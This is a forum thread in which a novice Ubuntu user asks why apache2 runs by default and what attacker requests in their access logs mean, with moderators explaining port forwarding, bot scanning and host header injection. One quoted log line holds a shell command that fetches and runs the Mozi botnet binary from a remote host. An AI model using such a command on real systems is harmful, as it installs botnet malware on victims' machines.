logo
Apache Lounge
Webmasters

 

About Forum Index Downloads Search Register Log in  RSS Apache Lounge  


Keep Server Online

If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.

or

Bitcoin

A donation makes a contribution towards the costs, the time and effort that's going in this site and building.

Thank You! Steffen

Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.


Post new topic   Forum Index -> Apache View previous topic :: View next topic
Reply to topic   Topic: unwarranted apache2 processes
Author
untalented



Joined: 20 Apr 2021
Posts: 5

PostPosted: Tue 20 Apr '21 13:33    Post subject: unwarranted apache2 processes Reply with quote

Hello,

For context I am learning programming and not very well versed into how Apache works.
My OS is Ubuntu 20.04.

I installed apache2 several months ago. It was purely to access local projects through localhost on a web browser and learn a few things about PHP; I have never tried to host an externally accessible web server on my machine.

A few days ago I needed to listen on port 80 for a programming project. I realized that I could not because several apache2 processes were already listening on that port. Killing the processes made them restart instantly.
Trying to understand what was happening I stumbled upon the Apache log files in /var/log/apache.

I was baffled to discover more than a dozen of access.log files containing what seem to be external connections to an apache2 server on my machine. These come from a variety of IP addresses from all over the world. Some of the requests seem to be scanning for vulnerabilities or even consist of shellcode.
Here are few samples :

Code:
117.201.202.141 - - [09/Apr/2021:19:09:18 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.201.202.141:54965/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 493 "-" "Hello, world"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:36 +0200] "\x16\x03" 400 0 "-" "-"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:38 +0200] "GET / HTTP/1.1" 200 3440 "-" "Chrome/54.0 (Windows NT 10.0)"


Some of these have a 200 status, meaning they succeeded ?

This does not make any sense to me.
Why were apache2 processes even running ? And how is it possible that my computer was reachable from the outside world ?

Does installing apache2 mean that the OS will automatically launch a server process upon startup, a server that will readily listen on port 80 and accept external connections ?

Or does it look like a malware was starting the apache2 processes and using them ?

I have never run an actual server so I do not know if any of that makes sense.

Needless to say I am extremely worried that my computer has been compromised somehow. I realize my questions must seem stupid but I really need help to understand what has been happening.

Thanks a lot for your help.
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

PostPosted: Thu 22 Apr '21 21:26    Post subject: Re: unwarranted apache2 processes Reply with quote

untalented wrote:


I was baffled to discover more than a dozen of access.log files containing what seem to be external connections to an apache2 server on my machine. These come from a variety of IP addresses from all over the world. Some of the requests seem to be scanning for vulnerabilities or even consist of shellcode.
Here are few samples :

Code:
117.201.202.141 - - [09/Apr/2021:19:09:18 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.201.202.141:54965/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 493 "-" "Hello, world"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:36 +0200] "\x16\x03" 400 0 "-" "-"


Code:
111.7.96.151 - - [06/Apr/2021:10:56:38 +0200] "GET / HTTP/1.1" 200 3440 "-" "Chrome/54.0 (Windows NT 10.0)"


Some of these have a 200 status, meaning they succeeded ?

The 200 status means page found. If someone calls / is the the index page. Like http://example.com/

untalented wrote:

Why were apache2 processes even running ?


On Ubuntu apache is installed as a service by default and will be restarted if it is no running. You can disable that behavior with sudo systemcl

untalented wrote:

And how is it possible that my computer was reachable from the outside world ?

Usually it the router / firewall config / port forwarding.

untalented wrote:

Does installing apache2 mean that the OS will automatically launch a server process upon startup, a server that will readily listen on port 80 and accept external connections ?


Yes, see above.

untalented wrote:

Or does it look like a malware was starting the apache2 processes and using them ?


I guess not, but I can't check the installation.

untalented wrote:

Needless to say I am extremely worried that my computer has been compromised somehow. I realize my questions must seem stupid but I really need help to understand what has been happening.


Most of those attacks that you see in your logs are harmless as long you don't have software running on that server which the attacker can attack.
Back to top
untalented



Joined: 20 Apr 2021
Posts: 5

PostPosted: Sat 24 Apr '21 17:03    Post subject: Reply with quote

Thanks a lot for your answers, they helped me a lot.

I discovered that I had indeed forwarded the port 80 in my router. I had done it to fix an application a long time ago and had forgotten about it; I guess that explains how my computer was reachable from the outside.

If you don't mind, I have a few more questions :

    - do bots typically try out random IP addresses, or is it likely that they harvested mine somehow ?

    - most of the requests with a 200 status code were indeed asking for the root. Does the root correspond to what was in /var/www/html ?

    - what to make of a request like this ? What is it doing ?
    Code:
    180.95.231.6 - - [05/Apr/2021:18:47:19 +0200] "GET http://www.epochtimes.com/ HTTP/1.1" 200 3477 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"


    - isnt it common to install apache purely to test websites, with no intent of being reachable from the exterior ? Are there common steps to take to avoid this kind of problem ?



Thanks again.
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

PostPosted: Sun 25 Apr '21 19:34    Post subject: Reply with quote

untalented wrote:

do bots typically try out random IP addresses, or is it likely that they harvested mine somehow ?


bots to randomly test all IP addresses for running services and try to attack it. I don't think that they got you.

untalented wrote:

most of the requests with a 200 status code were indeed asking for the root. Does the root correspond to what was in /var/www/html ?


Yes to that, what ever you defined an DirectoryIndex. Most likely index.html or index.php

That is the reason you have a default empty vhost with a blank index file in it and all the other stuff in name based vhosts.

untalented wrote:

what to make of a request like this ? What is it doing ?
Code:
180.95.231.6 - - [05/Apr/2021:18:47:19 +0200] "GET http://www.epochtimes.com/ HTTP/1.1" 200 3477 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"



The question mark is a separator in the url between the url and the so called query string.[1] Basically url GET parameters.

untalented wrote:

isnt it common to install apache purely to test websites, with no intent of being reachable from the exterior ? Are there common steps to take to avoid this kind of problem ?


Most administrators install apache as a reachable web server from the internet. So the default behavior is correct.
To avoid this use a firewall / router.


If you still have a question please ask again.


[1] https://en.wikipedia.org/wiki/Query_string
Back to top
untalented



Joined: 20 Apr 2021
Posts: 5

PostPosted: Mon 26 Apr '21 10:17    Post subject: Reply with quote

Thanks again for your help.

James Blond wrote:

The question mark is a separator in the url between the url and the so called query string.[1] Basically url GET parameters.


I know about URL format, but I'm not sure what you mean as there is no question mark in the request.
Perhaps I was not clear : this was a request sent to my computer when apache2 was running. There were several with a similar format, for example :

Code:
171.37.39.31 - - [13/Apr/2021:21:09:25 +0200] "GET http://dongtaiwang.com/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"


What I'm not understanding is what these requests are doing. In the request line, the resource asked for is the URL of a website, for instance http://www.epochtimes.com/.
Obviously this is not a local resource present on my computer, but the request has a 200 status code. So what is it doing ? Is it asking for my computer to retrieve an external webpage ? This seems extremely dangerous from a security standpoint so I find it hard to believe that such requests would be allowed by default. This is why I'm puzzled.

Thanks
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

PostPosted: Mon 26 Apr '21 12:13    Post subject: Reply with quote

I'm not sure either what that request shall do.

Code:

curl -i -H "GET http://www.epochtimes.com/ HTTP/1.1" -H "Host: www.example.com" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" -H "Accept-Language: de-DE,en-US;q=0.7,en;q=0.3" http://www.example.com


That gives me a 200 status code, too, but the HTML I get is from the www.example.com page.

On my own server I get a 400 error, because of the security headers.

Code:

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Expect-CT: max-age=86400, enforce
Feature-Policy: geolocation 'none'; midi 'none'; camera 'none'; usb 'none'; magnetometer 'none'; accelerometer 'none'; vr 'none'; speaker 'none'; ambient-light-sensor 'none'; gyroscope 'none'; microphone 'none'
Content-Security-Policy:        default-src 'self' 'unsafe-inline' data:;       font-src 'self' 'unsafe-inline' fonts.gstatic.com data:;        style-src 'self' 'unsafe-inline' fonts.googleapis.com;          script-src 'self' 'unsafe-inline' 'unsafe-eval';
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>
Back to top
tangent



Joined: 16 Aug 2020
Posts: 83
Location: UK

PostPosted: Mon 26 Apr '21 20:58    Post subject: Reply with quote

Further to James' reply, I would suggest your unwanted HTTP requests (such as http://dongtaiwang.com), are Host Header Injection (HHI) attacks, where the miscreant has simply supplied a false host header value.

By default most web servers, including Apache, will pass unknown host header requests to the first virtual host in the configuration, and depending on what scripted content your site serves, it's possible (amongst other things) to redirect the client browser to the attacker's site. There's plenty of details and examples out on the net over HHI attacks.

Your real problem though isn't the Apache defaults, which are designed to get you up and running as quickly as possible, but that your router was configured to forward port 80 through to your internal server. Bots are always scanning the net, looking for open service ports to attack.
Back to top
untalented



Joined: 20 Apr 2021
Posts: 5

PostPosted: Tue 27 Apr '21 22:15    Post subject: Reply with quote

Thanks for your help.

In my case, what did apache reply to these requests with ? Did it still send the index page ?


Also, does it mean that one can send arbitrary request strings like "GET http://example.com/" and still receive a response if this default behavior is not changed ?
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 6935
Location: Germany, Next to Hamburg

PostPosted: Tue 27 Apr '21 23:04    Post subject: Reply with quote

untalented wrote:


In my case, what did apache reply to these requests with ? Did it still send the index page ?


Yes, it did.

untalented wrote:

Also, does it mean that one can send arbitrary request strings like "GET http://example.com/" and still receive a response if this default behavior is not changed ?


mod security is an option to prevent such things (a bit tricky to configure) and the security headers that I posted above.
Back to top
untalented



Joined: 20 Apr 2021
Posts: 5

PostPosted: Wed 28 Apr '21 21:26    Post subject: Reply with quote

I understand.
Thanks a lot for all the help, it was a real relief.
Back to top


Reply to topic   Topic: unwarranted apache2 processes View previous topic :: View next topic
Post new topic   Forum Index -> Apache